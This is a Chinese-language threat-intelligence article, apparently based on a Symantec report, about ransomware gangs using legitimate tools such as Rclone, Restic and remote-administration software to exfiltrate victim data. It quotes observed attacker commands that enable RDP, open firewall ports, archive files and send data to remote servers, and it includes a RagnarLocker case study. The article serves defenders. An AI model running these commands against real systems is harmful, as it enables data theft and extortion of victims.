勒索软件团伙在攻击中使用了越来越多的数据泄露工具,赛门铁克在三个月内就发现了十几种不同的工具进行数据泄露。虽然其中一些工具是恶意软件,但绝大多数都是合法软件。
现在大多数勒索软件运营商都会使用双重勒索进行攻击。除了加密文件外,攻击者也会从受害者处窃取数据并威胁受害者泄露数据。该策略已经被一再证明有效,为攻击者提供了更多的敲诈资本,对付那些能够从备份中恢复数据的组织。
勒索软件团伙应用数据泄露工具的范围正在扩大,主要驱动因素有两个:
尽管 Rclone 目前仍然是勒索软件团伙最常用的数据泄露工具,但远程管理类软件的增速最快,例如 AnyDesk、ScreenConnect 和 Atera。数据泄露只是这些良性软件的功能之一,大多数软件都可以变成访问失陷主机的后门。
勒索软件团伙与数据泄露工具
在过去三个月中,攻击者最常用的数据泄露工具如下所示:
例如,攻击者可以通过简单修改注册表来启用 RDP:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
攻击者还可以创建防火墙规则,通过 netsh 命令允许 RDP 连接:
netsh advfirewall firewall add rule name=[NAME] RemoteDesktop" dir=in protocol=TCP localport=3389 action=allow
cmd /u [REMOVED] CSIDL_COMMON_APPDATA\rar.exe a -dh -hp[REMOVED] -m5 CSIDL_COMMON_APPDATA\1.rar CSIDL_COMMON_APPDATA\1.txt > CSIDL_COMMON_APPDATA\log.txt
Noberus 勒索软件使用的 Restic 命令如下所示,各种命令回传数据:
CSIDL_COMMON_VIDEO\restic.exe -r rest:http://[REMOVED]:8000/ init [REMOVED] CSIDL_COMMON_VIDEO\ppp.txt
CSIDL_COMMON_VIDEO\restic.exe -r rest:http://[REMOVED]:8000/ [REMOVED] CSIDL_COMMON_VIDEO\ppp.txt --use-fs-snapshot --verbose backup "CSIDL_SYSTEM_DRIVE\[REMOVED]"
powershell Compress-Archive CSIDL_PROFILE\public\[REMOVED]-fs CSIDL_PROFILE\public\[REMOVED]-fs.zip
案例研究:RagnarLocker 使用 Rclone
Rclone 是管理云中数据内容的开源工具,攻击者利用该工具从失陷主机窃取数据。勒索软件团伙现在非常频繁地使用 Rclone,攻击者也开始重命名伪装成其他工具。
2023 年 7 月,RagnarLocker 勒索软件团伙使用了 Rclone。首先,攻击者执行 PowerShell 命令以禁用 LSA 机制。然后,攻击者运行了 SoftPerfect Network Scanner 检测发现主机名和网络服务。
第二天,攻击者部署了 Mimikatz 和 LaZagne 来转储凭据并且收集系统信息、保存注册表配置、执行远程命令,启用了 RDP 协议以便远程访问。最后,攻击者使用 Rclone 获取数据:
rclone copy \\[REMOVED]\[REMOVED]\Shares --max-age 2095d [REMOVED]:[REMOVED]/ -P --exclude "*.{zip,log,rar,wav,mp4,mpeg}" --ignore-existing --auto-confirm --multi-thread-streams 6 --transfers 6
有趣的是,攻击者的命令中有许多错误,这说明攻击者是手动输入命令执行而非自动化执行。攻击者启用了文件共享服务 put.io 作为 Rclone 的连接,回传泄露的数据:
数据被泄露后,攻击者进入攻击的下一阶段,开始部署 RagnarLocker。
逃避检测
对大多数勒索软件团伙来说,数据泄露是攻击链中的关键步骤。攻击者创建了暗网数据泄露网站,发布不支付赎金的受害者的被窃数据。有能力的攻击者自研恶意软件,但也有攻击者选择转向使用合法软件,这样避免触发告警。